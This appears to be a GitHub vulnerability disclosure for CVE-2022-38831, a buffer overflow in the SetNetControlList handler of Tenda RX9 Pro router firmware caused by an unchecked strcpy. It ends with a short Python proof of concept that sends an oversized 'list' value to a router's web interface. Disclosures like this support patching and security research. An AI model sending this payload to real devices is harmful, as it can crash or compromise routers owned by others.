Headline
CVE-2022-38831: CVE/SetNetControlList.md at main · whiter6666/CVE
Tenda RX9_Pro V22.03.02.10 is vulnerable to Buffer Overflow via httpd/SetNetControlList
Permalink
Cannot retrieve contributors at this time
buffer overflow****Tenda_RX9_Pro
version: V22.03.02.10
Description:
There is a buffer overflow in httpd/SetNetControlList
Source:
you may download it from : https://www.tendacn.com/download/detail-4218.html
Analyse:
get value from list and send it to sub_43157C
don’t check the length of a1 and call strcpy
POC
url = "http://192.168.1.13/goform/SetNetControlList"
payload = 'A'*300 + '\n'
r = requests.post(url, data={'list': payload})